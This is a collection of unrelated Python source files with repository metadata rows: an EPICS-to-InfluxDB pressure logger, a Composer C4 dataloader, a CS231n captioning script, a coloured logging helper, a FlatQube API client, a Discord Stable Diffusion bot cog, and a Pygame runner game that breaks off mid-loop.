        "fields": {
            "RPump1-Pressure": pv1_m_data['value'],
            "TMPump1-PressureAdmission": pv2_m_data['value'],
            "VVessel-Pressure": pv3_m_data['value']
        }
    }]
    print(json_body)
    client.write_points(json_body)
    time.sleep(SCAN_PERIOD)

# Everything that followed the infinite loop above was unreachable dead code
# (leftover MySQL archiver queries and prints); kept here as reference only.
# valuePrimary2 = epics.caget('ISTTOK:central:RPump2-Pressure')
# valueChamber1 = epics.caget('ISTTOK:central:VVessel-Pressure')
# valueTMPadmission = epics.caget('ISTTOK:central:TMPump1-PressureAdmission')
# 19 | ISTTOK:central:VVessel-Pressure
# sql_chamber = ("SELECT `smpl_time`, `float_val` FROM `sample` WHERE `channel_id` = 5 "
#                "AND `smpl_time` > addtime(now(),'-01:00:00') ORDER BY `smpl_time` DESC LIMIT 100;")
# 21 | ISTTOK:central:RPump1-Pressure
# sql_primary = ("SELECT `smpl_time`, `float_val` FROM `sample` WHERE `channel_id` = 6 "
#                "AND `smpl_time` > addtime(now(),'-01:00:00') ORDER BY `smpl_time` DESC LIMIT 100;")
| bernardocarvalho/isttok-epics | epics/isttok_influx.py | isttok_influx.py | py | 4,564 | python | en | code | 0 | github-code | 90 |
5291439568 | import logging
import warnings
from typing import Any, Dict, Optional
from torch.utils.data import DataLoader
from composer.core import DataSpec
from composer.utils import MissingConditionalImportError, dist
log = logging.getLogger(__name__)
__all__ = ['build_streaming_c4_dataloader']
def build_streaming_c4_dataloader(
    global_batch_size: int,
    remote: str = 's3://mosaicml-internal-dataset-c4/mds/2/',
    local: str = '/tmp/mds-cache/mds-c4/',
    split: str = 'train',
    shuffle: bool = True,
    drop_last: bool = True,
    tokenizer_name: str = 'bert-base-uncased',
    max_seq_len: int = 512,
    group_method: str = 'truncate',
    mlm: bool = False,
    mlm_probability: float = 0.15,
    predownload: Optional[int] = 100_000,
    keep_zip: Optional[bool] = None,
    download_retry: int = 2,
    download_timeout: float = 60,
    validate_hash: Optional[str] = None,
    shuffle_seed: Optional[int] = None,
    num_canonical_nodes: Optional[int] = None,
    **dataloader_kwargs: Dict[str, Any],
):
    """Builds a :class:`.DataSpec` for the StreamingC4 (Colossal Cleaned Common Crawl) dataset.

    Args:
        global_batch_size (int): Global batch size. Must be divisible by the
            distributed world size; each rank receives an equal shard.
        remote (str): Remote directory (S3 or local filesystem) where dataset is stored.
            Default: ``'s3://mosaicml-internal-dataset-c4/mds/2/'``
        local (str): Local filesystem directory where dataset is cached during operation.
            Default: ``'/tmp/mds-cache/mds-c4/'``
        split (str): What split of the dataset to use. Either ``'train'`` or ``'val'``.
            Default: ``'train'``.
        shuffle (bool): whether to shuffle the dataset. Default: ``True``.
        drop_last (bool): whether to drop last samples. Default: ``True``.
        tokenizer_name (str): The name of the HuggingFace tokenizer to preprocess text with. Default:
            ``'bert-base-uncased'``.
        max_seq_len (int): The max sequence length of each token sample. Default: ``512``.
        group_method (str): How to group text samples into token samples. Currently only `truncate` is supported.
        mlm (bool): Whether or not to use masked language modeling. Default: ``False``.
        mlm_probability (float): If ``mlm==True``, the probability that tokens are masked. Default: ``0.15``.
        predownload (int, optional): Target number of samples ahead to download the shards of while
            iterating. Defaults to ``100_000``.
        keep_zip (bool, optional): Whether to keep or delete the compressed file when
            decompressing downloaded shards. If ``None``, this builder passes ``False``
            (delete after decompression) to the streaming dataset. Defaults to ``None``.
        download_retry (int): Number of download re-attempts before giving up. Defaults to ``2``.
        download_timeout (float): Number of seconds to wait for a shard to download before raising
            an exception. Defaults to ``60``.
        validate_hash (str, optional): Optional hash or checksum algorithm to use to validate
            shards. Defaults to ``None``.
        shuffle_seed (int, optional): Seed for shuffling. If ``None``, a fixed default
            seed of ``9176`` is used, so runs are reproducible by default. Defaults to
            ``None``.
        num_canonical_nodes (int, optional): Canonical number of nodes for shuffling with resumption.
            Defaults to ``None``, which is interpreted as the number of nodes of the initial run.
        **dataloader_kwargs (Dict[str, Any]): Additional settings for the dataloader (e.g. num_workers, etc.)
    """
    warnings.warn(DeprecationWarning('build_streaming_c4_dataloader is deprecated and will be removed in v0.18'))

    # transformers is an optional dependency; fail with an actionable message.
    try:
        import transformers
    except ImportError as e:
        raise MissingConditionalImportError(extra_deps_group='nlp', conda_package='transformers') from e

    # Split the global batch evenly across ranks.
    if global_batch_size % dist.get_world_size() != 0:
        raise ValueError(
            f'global_batch_size ({global_batch_size}) must be divisible by world_size ({dist.get_world_size()}).')
    batch_size = global_batch_size // dist.get_world_size()

    # mosaicml-streaming is also optional.
    try:
        from streaming.text import StreamingC4
    except ImportError as e:
        raise MissingConditionalImportError(extra_deps_group='streaming', conda_package='mosaicml-streaming') from e

    dataset = StreamingC4(
        tokenizer_name=tokenizer_name,
        max_seq_len=max_seq_len,
        group_method=group_method,
        local=local,
        remote=remote,
        split=split,
        shuffle=shuffle,
        predownload=predownload,
        # None is coerced to False here (delete compressed shards).
        keep_zip=keep_zip if keep_zip is not None else False,
        download_retry=download_retry,
        download_timeout=download_timeout,
        validate_hash=validate_hash,
        # None falls back to a fixed seed for reproducibility.
        shuffle_seed=shuffle_seed if shuffle_seed is not None else 9176,
        num_canonical_nodes=num_canonical_nodes,
        batch_size=batch_size,
    )

    # Collator handles (optional) MLM masking using the dataset's tokenizer.
    collate_fn = transformers.DataCollatorForLanguageModeling(
        tokenizer=dataset.tokenizer,
        mlm=mlm,
        mlm_probability=mlm_probability,
    )

    dataloader = DataLoader(
        dataset=dataset,
        batch_size=batch_size,
        drop_last=drop_last,
        collate_fn=collate_fn,
        **dataloader_kwargs,
    )

    return DataSpec(dataloader=dataloader)
| mosaicml/composer | composer/datasets/c4.py | c4.py | py | 5,199 | python | en | code | 4,712 | github-code | 90 |
36275889917 | # coding: utf-8
import time, datetime
import os, json
import numpy as np
import matplotlib.pyplot as plt
import nltk
from cs231n.gradient_check import eval_numerical_gradient, eval_numerical_gradient_array
from cs231n.rnn_layers import *
from cs231n.captioning_solver import CaptioningSolver
from cs231n.classifiers.rnn import CaptioningRNN
from cs231n.coco_utils import load_coco_data, sample_coco_minibatch, decode_captions
from cs231n.image_utils import image_from_url
s = time.time()
print(datetime.datetime.now())
plt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
def rel_error(x, y):
    """Return the maximum elementwise relative error between arrays x and y."""
    numerator = np.abs(x - y)
    # Floor the denominator at 1e-8 to avoid division by zero.
    denominator = np.maximum(1e-8, np.abs(x) + np.abs(y))
    return np.max(numerator / denominator)
def BLEU_score(gt_caption, sample_caption):
    """
    gt_caption: string, ground-truth caption
    sample_caption: string, your model's predicted caption
    Returns unigram BLEU score.
    """
    special_markers = ('<END>', '<START>', '<UNK>')

    def strip_special(caption):
        # Keep only tokens that contain none of the special markers.
        return [tok for tok in caption.split(' ')
                if not any(marker in tok for marker in special_markers)]

    reference = strip_special(gt_caption)
    hypothesis = strip_special(sample_caption)
    return nltk.translate.bleu_score.sentence_bleu([reference], hypothesis, weights=[1])
def evaluate_model(model,med_data):
    """
    model: CaptioningRNN model
    med_data: COCO data dict (as returned by load_coco_data) to sample from

    Prints unigram BLEU score averaged over 1000 training and val examples.
    """
    BLEUscores ={}
    for split in ['train', 'val']:
        # Draw 1000 (caption, feature, url) samples from the given split.
        minibatch = sample_coco_minibatch(med_data, split=split, batch_size=1000)
        gt_captions, features, urls = minibatch
        # NOTE(review): the vocabulary comes from the module-level `data`,
        # not from `med_data` — presumably both share the same idx_to_word;
        # verify, or use med_data['idx_to_word'] for consistency.
        gt_captions = decode_captions(gt_captions, data['idx_to_word'])
        sample_captions = model.sample(features)
        sample_captions = decode_captions(sample_captions, data['idx_to_word'])
        total_score = 0.0
        for gt_caption, sample_caption, url in zip(gt_captions, sample_captions, urls):
            total_score += BLEU_score(gt_caption, sample_caption)
        # Mean unigram BLEU over the sampled minibatch.
        BLEUscores[split] = total_score / len(sample_captions)
    for split in BLEUscores:
        print('Average BLEU score for %s: %f' % (split, BLEUscores[split]))
# ---- Experiment configuration ----
max_train = 10000
batch_size=128
num_epochs = 1

# Full COCO feature set (PCA-reduced); provides the word<->index vocabulary.
data = load_coco_data(pca_features=True)
#np.random.seed(231)
# Small subset used to train/sanity-check the LSTM captioning model.
small_data = load_coco_data(max_train=max_train)
############################################################
small_lstm_model = CaptioningRNN(
    cell_type='lstm',
    word_to_idx=data['word_to_idx'],
    input_dim=data['train_features'].shape[1],
    hidden_dim=512,
    wordvec_dim=256,
    dtype=np.float32,
)

small_lstm_solver = CaptioningSolver(small_lstm_model, small_data,
                                     update_rule='adam',
                                     num_epochs=num_epochs,
                                     batch_size=batch_size,
                                     optim_config={
                                         'learning_rate': 5e-3,
                                     },
                                     lr_decay=0.995,
                                     verbose=True, print_every=10,
                                     )

small_lstm_solver.train()

# Visualize two sampled captions per split next to their ground truth.
for split in ['train', 'val']:
    minibatch = sample_coco_minibatch(small_data, split=split, batch_size=2)
    gt_captions, features, urls = minibatch
    gt_captions = decode_captions(gt_captions, data['idx_to_word'])
    sample_captions = small_lstm_model.sample(features)
    sample_captions = decode_captions(sample_captions, data['idx_to_word'])
    for gt_caption, sample_caption, url in zip(gt_captions, sample_captions, urls):
        plt.imshow(image_from_url(url))
        plt.title('%s\n%s\nGT:%s' % (split, sample_caption, gt_caption))
        plt.axis('off')
        plt.show()
        print(split, sample_caption,"\n--->", gt_caption)

# Report average unigram BLEU on train/val samples.
evaluate_model(small_lstm_model,small_data)

e = time.time()
print(e-s,"sec")  # total wall-clock runtime; `s` was captured at script start
| hccho2/cs231n-Assignment | assignment3/test-LSTM.py | test-LSTM.py | py | 3,995 | python | en | code | 0 | github-code | 90 |
1622578155 | import logging
class Loggers:
    """
    Application's logging interface.
    """

    main_name = "ingestation_main_logger"
    main_fmt = "%(asctime)s [%(levelname)s]: %(message)s"
    console_fmt = f"\n{main_fmt}"

    def __init__(self, cli_options: dict):
        self.options = cli_options
        self.logger = self.define_main_logger()
        self.configure_loggers()

    def define_main_logger(self) -> logging.Logger:
        """Create the main logger; level DEBUG so handlers do the filtering."""
        main_logger = logging.getLogger(self.main_name)
        main_logger.setLevel(logging.DEBUG)
        return main_logger

    def add_handlers(self) -> None:
        self.add_console_handler()

    def configure_loggers(self) -> None:
        self.add_handlers()

    def add_console_handler(self) -> None:
        """Attach a colourized stderr handler; INFO+ unless --debug was given."""
        console_handler = logging.StreamHandler()
        console_handler.setFormatter(ColourFormatter(self.console_fmt))
        if not self.options["debug"]:
            console_handler.setLevel(logging.INFO)
        self.logger.addHandler(console_handler)
class ColourFormatter(logging.Formatter):
    """
    Logging formatter designed to colour console messages.

    Overrides level_formats instance variable of logging.Formatter.
    Overrides format() instance method of logging.Formatter.
    Extends __init__ of logging.Formatter with ANSI escape colour definitions.
    """

    def __init__(self, formatter):
        super().__init__()
        reset = "\x1b[0m"
        # ANSI colour prefix per log level.
        level_colours = {
            logging.DEBUG: "\x1b[1;32m",     # light green
            logging.INFO: "\x1b[0;38m",      # grey
            logging.WARNING: "\x1b[0;33m",   # yellow
            logging.ERROR: "\x1b[0;31m",     # red
            logging.CRITICAL: "\x1b[1;31m",  # light red
        }
        self.level_formats = {
            level: colour + formatter + reset
            for level, colour in level_colours.items()
        }

    def format(self, record):
        coloured_fmt = self.level_formats.get(record.levelno)
        return logging.Formatter(coloured_fmt).format(record)
| LegenJCdary/ingeSTation | src/modules/outputs/loggers.py | loggers.py | py | 2,029 | python | en | code | 1 | github-code | 90 |
36437158025 | # -*- coding: utf-8 -*-
from typing import Any, Generic, Iterable, Optional, Type, TypeVar, Union
from decimal import Decimal
from enum import Enum
from operator import attrgetter
from pydantic import ValidationError
import requests
from .config import config
from .models import CurrencyInfo, FarmingPoolInfo, PairInfo
class FlatQubeClientError(Exception):
    """Raised for any failure inside the FlatQube REST client."""
class SortOrder(str, Enum):
    """Sort direction; the str mixin lets plain CLI strings construct members."""
    ascend = 'ascend'
    descend = 'descend'
TData = TypeVar('TData', bound=Union[CurrencyInfo, PairInfo])
class SortBy(Generic[TData]):
    """Generic sort-by mixin for enums: the member name is used as the
    attribute to sort model objects on.
    """

    def __call__(self: Enum,
                 iterable: Iterable[TData],
                 *,
                 order: SortOrder = SortOrder.descend,
                 inplace: bool = False) -> Optional[list[TData]]:
        """Sort the given sequence by the attribute named after this member."""
        sort_key = attrgetter(self.name)
        descending = order == SortOrder.descend
        if not inplace:
            return sorted(iterable, key=sort_key, reverse=descending)
        if not isinstance(iterable, list):
            raise TypeError("The argument must be a list for sorting inplace.")
        iterable.sort(key=sort_key, reverse=descending)
        return None
class CurrencySortBy(SortBy[CurrencyInfo], str, Enum):
    """Currencies sort by

    Member names match CurrencyInfo attributes (used by SortBy.__call__);
    values are presumably the indexer's sort-field identifiers -- TODO confirm.
    """
    price = 'price'
    price_change = 'price-ch'
    tvl = 'tvl'
    tvl_change = 'tvl-ch'
    volume_24h = 'vol24h'
    volume_change_24h = 'vol24h-ch'
    volume_7d = 'vol7d'
    transaction_count_24h = 'trans24h'
    fee_24h = 'fee24h'
class PairSortBy(SortBy[PairInfo], str, Enum):
    """Pairs sort by

    Member names match PairInfo attributes (used by SortBy.__call__);
    values are presumably the indexer's sort-field identifiers -- TODO confirm.
    """
    fee_24h = 'fee24h'
    fee_7d = 'fee7d'
    fee_all_time = 'fee-all-time'
    left_locked = 'left-locked'
    right_locked = 'right-locked'
    left_price = 'left-price'
    right_price = 'right-price'
    tvl = 'tvl'
    tvl_change = 'tvl-ch'
    volume_24h = 'vol24h'
    volume_24h_change = 'vol24h-ch'
    volume_7d = 'vol7d'
class FlatQubeClient:
    """FlatQube REST API client
    """

    def __init__(self):
        # Base endpoints come from app config; trailing slashes are stripped so
        # the f-string URL joins below never produce '//' in paths.
        self._swap_api_url = config.api_urls.swap_indexer.rstrip('/')
        self._farming_api_url = config.api_urls.farming_indexer.rstrip('/')
        # Created lazily on first use via the `session` property.
        self._session: Optional[requests.Session] = None

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Close and drop the HTTP session when used as a context manager.
        if self._session:
            self._session.close()
            self._session = None

    @property
    def session(self) -> requests.Session:
        # Lazily-created shared session (connection pooling across requests).
        if not self._session:
            self._session = requests.Session()
        return self._session

    def currency_total_count(self, white_list_url: Optional[str] = None) -> int:
        """Return total currencies on the service or a white list
        """
        return self._get_total_count('currencies', white_list_url=white_list_url)

    def all_currencies(self, white_list_url: Optional[str] = None) -> Iterable[CurrencyInfo]:
        """Generator for all currencies from the service or a white list
        """
        yield from self._get_currencies(white_list_url=white_list_url)

    def whitelist_currencies(self) -> Iterable[CurrencyInfo]:
        """Return Broxus white list currencies
        """
        yield from self._get_currencies(white_list_url=config.token_white_list_url)

    def currencies(self,
                   addresses: Iterable[str],
                   white_list_url: Optional[str] = None,
                   sort_by: Union[str, CurrencySortBy] = CurrencySortBy.tvl,
                   sort_order: Union[str, SortOrder] = SortOrder.ascend) -> list[CurrencyInfo]:
        """Get currencies info by addresses, sorted client-side.

        `sort_by`/`sort_order` accept either enum members or their string values.
        """
        sort_by = CurrencySortBy(sort_by)
        sort_order = SortOrder(sort_order)
        params = {
            'currencyAddresses': list(addresses)
        }
        currencies = self._get_currencies(
            params=params,
            white_list_url=white_list_url
        )
        return sort_by(
            currencies,
            order=sort_order,
            inplace=False,
        )

    def currency(self, address: str) -> CurrencyInfo:
        """Get currency info by address
        """
        api_url = f'{self._swap_api_url}/currencies/{address}'
        return self._parse_currency_data(
            self._request(self.session.post, api_url)
        )

    def pair_total_count(self, white_list_url: Optional[str] = None) -> int:
        """Return total pairs on the service or a white list
        """
        return self._get_total_count('pairs', white_list_url=white_list_url)

    def all_pairs(self,
                  tvl_ge: Union[None, float, Decimal] = None,
                  tvl_le: Union[None, float, Decimal] = None,
                  white_list_url: Optional[str] = None) -> Iterable[PairInfo]:
        """Get info about all pairs on FlatQube, optionally bounded by TVL.
        """
        # NOTE(review): a falsy bound (0) is treated the same as None here.
        tvl_ge = str(tvl_ge) if tvl_ge else None
        tvl_le = str(tvl_le) if tvl_le else None
        params = {
            'tvlAmountGe': tvl_ge,
            'tvlAmountLe': tvl_le,
        }
        yield from self._get_pairs(params=params, white_list_url=white_list_url)

    def whitelist_pairs(self,
                        tvl_ge: Union[None, float, Decimal] = None,
                        tvl_le: Union[None, float, Decimal] = None) -> Iterable[PairInfo]:
        """Return Broxus white list pairs
        """
        yield from self.all_pairs(
            tvl_ge=tvl_ge,
            tvl_le=tvl_le,
            white_list_url=config.token_white_list_url
        )

    def pairs(self,
              currency_address: str,
              currency_addresses: Union[None, str, Iterable[str]] = None,
              tvl_ge: Union[None, float, Decimal] = None,
              tvl_le: Union[None, float, Decimal] = None,
              white_list_url: Optional[str] = None,
              sort_by: Union[str, PairSortBy] = PairSortBy.tvl,
              sort_order: Union[str, SortOrder] = SortOrder.ascend) -> list[PairInfo]:
        """Get pairs info by given currency addresses, sorted client-side.
        """
        sort_by = PairSortBy(sort_by)
        sort_order = SortOrder(sort_order)
        # Normalize a single address string to a one-element list.
        if isinstance(currency_addresses, str):
            currency_addresses = [currency_addresses]
        elif isinstance(currency_addresses, Iterable):
            currency_addresses = list(currency_addresses)
        # NOTE(review): a falsy bound (0) is treated the same as None here.
        tvl_ge = str(tvl_ge) if tvl_ge else None
        tvl_le = str(tvl_le) if tvl_le else None
        params = {
            'currencyAddress': currency_address,
            'currencyAddresses': currency_addresses,
            'tvlAmountGe': tvl_ge,
            'tvlAmountLe': tvl_le,
        }
        pairs = self._get_pairs(
            params=params,
            white_list_url=white_list_url
        )
        return sort_by(
            pairs,
            order=sort_order,
            inplace=False,
        )

    def pair(self, left_address: str, right_address: Optional[str] = None) -> PairInfo:
        """Get pair info by pool address or left/right currency addresses
        """
        base_url = f'{self._swap_api_url}/pairs'
        if right_address is None:
            # Single argument: treat it as the pool address.
            api_url = f'{base_url}/address/{left_address}'
        else:
            api_url = f'{base_url}/left/{left_address}/right/{right_address}'
        return self._parse_pair_data(
            self._request(self.session.post, api_url)
        )

    def farmin_pool(self,
                    pool_address: str,
                    user_address: Optional[str] = None,
                    after_zero_balance: bool = True) -> FarmingPoolInfo:
        """Get info about a farming pool

        NOTE(review): the method name has a typo ('farmin'); kept as-is
        because renaming would break existing callers.
        """
        api_url = f'{self._farming_api_url}/farming_pools/{pool_address}'
        data = {
            'afterZeroBalance': after_zero_balance,
            'userAddress': user_address,
        }
        farming_pool_info = self._request(self.session.post, api_url, data=data)
        try:
            return FarmingPoolInfo.parse_obj(farming_pool_info)
        except ValidationError as err:
            raise FlatQubeClientError(f'Cannot parse farming pool info\n{err}') from err

    @staticmethod
    def _request(method, api_url, data=None):
        # All service endpoints are called with a JSON payload; any transport
        # or HTTP error is re-raised as FlatQubeClientError.
        try:
            with method(api_url, json=data) as resp:
                resp.raise_for_status()
                return resp.json()
        except Exception as err:
            raise FlatQubeClientError(f'{err}') from err

    def _get_total_count(self, name: str, white_list_url: Optional[str] = None):
        # limit=0 fetches no items, only the `totalCount` metadata.
        api_url = f'{self._swap_api_url}/{name}'
        data = {
            "limit": 0,
            "offset": 0,
            "whiteListUri": white_list_url,
        }
        result = self._request(self.session.post, api_url, data=data)
        return result['totalCount']

    @staticmethod
    def _parse_data(name: str, data: dict[str, Any], model_cls: Type[TData]) -> TData:
        # Validate a raw API dict into the given pydantic model.
        try:
            return model_cls.parse_obj(data)
        except ValidationError as err:
            raise FlatQubeClientError(f'Cannot parse {name} data "{data}"\n{err}') from err

    def _parse_currency_data(self, data: dict[str, Any]) -> CurrencyInfo:
        return self._parse_data('currency', data, CurrencyInfo)

    def _parse_pair_data(self, data: dict[str, Any]) -> PairInfo:
        return self._parse_data('pair', data, PairInfo)

    def _get_data(self,
                  name: str,
                  params: Optional[dict[str, Any]] = None,
                  white_list_url: Optional[str] = None) -> Iterable[dict[str, Any]]:
        # Paginated fetch: request `api_bulk_limit` items at a time, advancing
        # the offset until `totalCount` items have been yielded.
        # NOTE(review): assumes the server eventually satisfies
        # offset == totalCount exactly; verify against the API contract.
        api_url = f'{self._swap_api_url}/{name}'
        if not params:
            params = {}
        data = {
            **params,
            "limit": config.api_bulk_limit,
            "offset": 0,
            "whiteListUri": white_list_url,
        }
        while True:
            result = self._request(self.session.post, api_url, data=data)
            for info in result[name]:
                yield info
            offset = data['offset'] + len(result[name])
            if offset == result['totalCount']:
                break
            data['offset'] = offset

    def _get_currencies(self,
                        params: Optional[dict[str, Any]] = None,
                        white_list_url: Optional[str] = None) -> Iterable[CurrencyInfo]:
        for currency_data in self._get_data('currencies', params, white_list_url):
            yield self._parse_currency_data(currency_data)

    def _get_pairs(self,
                   params: Optional[dict[str, Any]] = None,
                   white_list_url: Optional[str] = None) -> Iterable[PairInfo]:
        for pair_data in self._get_data('pairs', params, white_list_url):
            yield self._parse_pair_data(pair_data)
| espdev/flatqube-client | flatqube/client.py | client.py | py | 10,814 | python | en | code | 2 | github-code | 90 |
71177298217 | import gi
gi.require_version('Gtk', '4.0')
from gi.repository import Gtk, Pango
class DocumentStatsView(Gtk.Box):
    """Sidebar panel showing word/character counts for the document."""

    def __init__(self):
        Gtk.Box.__init__(self)
        self.set_orientation(Gtk.Orientation.VERTICAL)
        self.get_style_context().add_class('document-stats')

        description = Gtk.Label.new(_('These counts are updated after the document is saved.'))
        description.set_wrap(True)
        description.set_xalign(0)
        description.get_style_context().add_class('description')
        self.append(description)

        # One stats paragraph for the whole document, one for the current file.
        self.label_whole_document = self._append_stats_label()
        self.label_current_file = self._append_stats_label()

    def _append_stats_label(self):
        """Create, configure and append an empty stats paragraph label."""
        label = Gtk.Label()
        label.set_wrap(True)
        label.set_wrap_mode(Pango.WrapMode.WORD_CHAR)
        label.set_xalign(0)
        label.get_style_context().add_class('stats-paragraph')
        self.append(label)
        return label
| cvfosammmm/Setzer | setzer/workspace/sidebar/document_stats/document_stats_viewgtk.py | document_stats_viewgtk.py | py | 1,242 | python | en | code | 362 | github-code | 90 |
21366567452 | from diffusers import DiffusionPipeline, DPMSolverMultistepScheduler, StableDiffusionInstructPix2PixPipeline
import torch
import discord
from discord.ext import commands
import io
import PIL
import math
import concurrent.futures
import asyncio
class ImageGenerator(commands.Cog):
    """Discord cog exposing Stable Diffusion text-to-image generation and
    InstructPix2Pix image editing as bot commands.

    Assumes at least two CUDA devices: generation runs on cuda:0 and editing
    on cuda:1 -- TODO confirm behavior on single-GPU hosts.
    """

    def __init__(self, bot):
        torch.cuda.empty_cache()
        self.bot = bot
        # One GPU per pipeline so generation and editing do not contend.
        self.device_1 = "cuda:0"
        self.device_2 = "cuda:1"
        # Text-to-image pipeline (fp16 weights) with a DPM-Solver scheduler.
        self.repo_id_gen = "stabilityai/stable-diffusion-2"
        self.pipe_gen = DiffusionPipeline.from_pretrained(self.repo_id_gen, torch_dtype=torch.float16, revision="fp16")
        self.pipe_gen.scheduler = DPMSolverMultistepScheduler.from_config(self.pipe_gen.scheduler.config)
        self.pipe_gen = self.pipe_gen.to(self.device_1)
        # Instruction-based image-editing pipeline.
        self.repo_id_edit = "timbrooks/instruct-pix2pix"
        self.pipe_edit = StableDiffusionInstructPix2PixPipeline.from_pretrained(self.repo_id_edit, torch_dtype=torch.float16).to(self.device_2)

    def process_image(self, image_bytes):
        """Decode an uploaded attachment and resize it for the edit pipeline.

        The image is EXIF-rotated, converted to RGB and rescaled so both
        dimensions are multiples of 64 around a ~512px target.
        """
        input_image = PIL.Image.open(io.BytesIO(image_bytes))
        input_image = PIL.ImageOps.exif_transpose(input_image)
        input_image = input_image.convert("RGB")
        width, height = input_image.size
        factor = 512 / max(width, height)
        factor = math.ceil(min(width, height) * factor / 64) * 64 / min(width, height)
        width = int((width * factor) // 64) * 64
        height = int((height * factor) // 64) * 64
        input_image = PIL.ImageOps.fit(input_image, (width, height), method=PIL.Image.Resampling.LANCZOS)
        return input_image

    def generate_image_blocking(self, prompt):
        # Synchronous GPU work; run via an executor so the bot loop stays responsive.
        with torch.no_grad():
            with torch.cuda.device(0):
                image = self.pipe_gen(prompt, guidance_scale=9, num_inference_steps=100).images[0]
        return image

    async def generate_image_async(self, ctx, prompt):
        # Off-load the blocking diffusion call to a worker thread.
        loop = asyncio.get_event_loop()
        with concurrent.futures.ThreadPoolExecutor() as pool:
            image = await loop.run_in_executor(pool, self.generate_image_blocking, prompt)
        return image

    @commands.command(aliases=["paint"])
    async def generate_image(self, ctx, *, prompt):
        """Generate an image based on the given prompt."""
        async with ctx.typing():
            image = await self.generate_image_async(ctx, prompt)
            if image:
                # Serialize to an in-memory PNG and upload as an attachment.
                with io.BytesIO() as binary_img:
                    image.save(binary_img, 'PNG')
                    binary_img.seek(0)
                    file = discord.File(binary_img, filename='image.png')
                    await ctx.send(file=file)
            else:
                await ctx.send("Unable to generate an image for the given prompt.")

    def edit_image_blocking(self, prompt, image):
        # Synchronous GPU work for the edit pipeline (second GPU).
        with torch.no_grad():
            with torch.cuda.device(1):
                image = self.pipe_edit(prompt, image=image, num_inference_steps=300, image_guidance_scale=1.5, guidance_scale=7).images[0]
        return image

    async def edit_image_async(self, ctx, prompt, image):
        # Off-load the blocking edit call to a worker thread.
        loop = asyncio.get_event_loop()
        with concurrent.futures.ThreadPoolExecutor() as pool:
            image = await loop.run_in_executor(pool, self.edit_image_blocking, prompt, image)
        return image

    @commands.command(aliases=["edit"])
    async def edit_image(self, ctx, *, prompt):
        """Edit the attached image according to the given instruction prompt."""
        # Check if there's an attachment (image) in the message
        if not ctx.message.attachments:
            await ctx.send("Please provide an image attachment.")
            return

        attachment = ctx.message.attachments[0]
        image_bytes = await attachment.read()
        image = self.process_image(image_bytes)

        async with ctx.typing():
            image = await self.edit_image_async(ctx, prompt, image)
            if image:
                with io.BytesIO() as binary_img:
                    image.save(binary_img, 'PNG')
                    binary_img.seek(0)
                    file = discord.File(binary_img, filename='edit.png')
                    await ctx.send(file=file)
            else:
                await ctx.send("Unable to generate an image for the given prompt.")
async def setup_diffusion_client(bot):
    """Register the ImageGenerator cog on the bot unless it is already loaded."""
    if not bot.get_cog("ImageGenerator"):
        await bot.add_cog(ImageGenerator(bot))
    else:
        # Bug fix: the previous message referred to the wrong cog ("Music").
        print("ImageGenerator cog has already been added.")
27711857886 | # importing the pygame module
import pygame
import random
import os
import time
# initialize the pygame module
pygame.init()
# load and set the logo
logo = pygame.image.load("logo.png")
pygame.display.set_icon(logo)
pygame.display.set_caption("Running Jack")
# screen size
WIDTH = 800
HEIGHT = 600
# colors
YELLOW = (255, 255, 0)
BLACK = (0, 0, 0)
WHITE = (255,255,255)
BLUE = (0, 0, 255)
RED = (255, 0, 0)
# create a surface on screen that has the size of 600 x 400
screen = pygame.display.set_mode((WIDTH, HEIGHT))
#load images in program
runAnimation = [pygame.image.load(os.path.join("player_img", "run1.png")), pygame.image.load(os.path.join("player_img", "run2.png")),
pygame.image.load(os.path.join("player_img", "run3.png")), pygame.image.load(os.path.join("player_img", "run4.png")),
pygame.image.load(os.path.join("player_img", "run5.png")), pygame.image.load(os.path.join("player_img", "run6.png")),
pygame.image.load(os.path.join("player_img", "run7.png")), pygame.image.load(os.path.join("player_img", "run8.png"))]
backgroundIMG = pygame.image.load("bg.png")
car = pygame.image.load("car.png")
# define a variable to control the main loop
running = True
scorefont = pygame.font.SysFont("monospace",32)
# obstacle Position variables
OX = 800
OY = 280
speed = 7
CLOCK = pygame.time.Clock()
# background speed
BX= 800
# score variable
score = 0
def collision():
    """Check whether the car obstacle has hit the player.

    Reads module globals OX (obstacle x) and character. On a hit, draws the
    "You Lose!" message and returns False; otherwise returns True. The caller
    tests `collision() is False`, so the previous implicit None return now
    becomes an explicit True with identical caller behavior.
    """
    car_overlaps_player = (180 >= OX >= 100) or (180 >= OX + 200 >= 100)
    if car_overlaps_player and character.y >= 275:
        screen.blit(scorefont.render("You Lose!", 1, BLACK), (325, 250))
        return False
    return True
# player object
class Character:
    # person position variables
    # NOTE: these are class attributes used as per-instance defaults; the first
    # assignment through `self` creates instance attributes shadowing them.
    x = 100          # horizontal screen position (fixed)
    y = 300          # vertical position; 300 = ground level
    jump = False     # True while ascending
    comedown = False # True while descending back to the ground
    runcount = 0.5   # fractional frame counter into the run animation
    vel=5            # pixels moved per physics step

    def jumpFunc(self):
        # Jumping Mechanism: ascend until y <= 120 (apex), then descend
        # until back at ground level (y >= 300).
        if self.jump is True:
            self.y -= self.vel
            if self.y <= 120:
                self.jump = False
        if self.jump is False and self.y <= 120:
            self.comedown = True
        if self.comedown is True:
            self.y += self.vel
            if self.y >= 300:
                self.comedown = False

    def draw(self):
        # Advance the run animation; round(runcount % 7) stays within the
        # 8-frame runAnimation list (indices 0..7).
        screen.blit(runAnimation[round(self.runcount % 7)], (self.x, self.y))
        self.runcount += 0.13
        # surface,color,rectangle [x y width height]
        #pygame.draw.rect(screen, BLUE, [self.x, self.y, 20, 50])
character = Character()
# Used to pause for one second on the very first rendered frame.
firsttime = True
# main loop
while running:
    # event handling, gets all event from the event queue
    for event in pygame.event.get():
        # only do something if the event is of type QUIT
        if event.type == pygame.QUIT:
            # change the value to False, to exit the main loop
            running = False
        # character movement: up-arrow starts a jump only from the ground
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_UP and character.y >= 300:
                character.jump = True
        # NOTE(review): jumpFunc is advanced once per *event*, not once per
        # frame — the jump stalls when no events arrive. Likely intended to
        # sit one level out, in the while-loop body; confirm before moving.
        character.jumpFunc()
    # background moving mechanism: scroll left, wrap at the left edge
    BX -= 5
    if BX < 0:
        BX = 800
    # obstacle moving mechanism: once fully off-screen, respawn and score
    OX -= speed
    if OX < -250:
        OX = 800
        score += 1
    # difficulty level: faster car (and jump) as the score rises
